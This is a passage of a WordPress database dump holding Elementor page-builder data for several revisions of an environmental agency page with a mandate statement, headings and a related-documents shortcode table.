width=\\\"400px,450px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12099,1965,'_elementor_controls_usage','a:3:{s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:1;}}}}}'),(12101,91,'ocean_post_layout','full-width'),(12110,1966,'_elementor_edit_mode','builder'),(12111,1966,'_elementor_template_type','wp-post'),(12112,1966,'_elementor_version','2.7.5'),(12113,1966,'_wp_page_template','default'),(12114,1966,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" tax:resource_tag=\\\"epa\\\",\\ncolumns=\\\"id,title,\\nexcerpt,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,400px,450px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12118,1967,'_elementor_edit_mode','builder'),(12119,1967,'_elementor_template_type','wp-post'),(12120,1967,'_elementor_version','2.7.5'),(12121,1967,'_wp_page_template','default'),(12122,1967,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" tax:resource_tag=\\\"epa\\\"\\ncolumns=\\\"id,title,\\nexcerpt,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,400px,450px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12126,1968,'_elementor_edit_mode','builder'),(12127,1968,'_elementor_template_type','wp-post'),(12128,1968,'_elementor_version','2.7.5'),(12129,1968,'_wp_page_template','default'),(12130,1968,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" tax=\\\"resource_tag:epa\\\"\\ncolumns=\\\"id,title,\\nexcerpt,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,400px,450px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12134,1969,'_elementor_edit_mode','builder'),(12135,1969,'_elementor_template_type','wp-post'),(12136,1969,'_elementor_version','2.7.5'),(12137,1969,'_wp_page_template','default'),(12138,1969,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" term=\\\"tax:\\\"resource_tag\\\":\\\"epa\\\"\\ncolumns=\\\"id,title,\\nexcerpt,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,400px,450px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12141,1970,'_elementor_edit_mode','builder'),(12142,1970,'_elementor_template_type','wp-post'),(12143,1970,'_elementor_version','2.7.5'),(12144,1970,'_wp_page_template','default'),(12145,1970,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"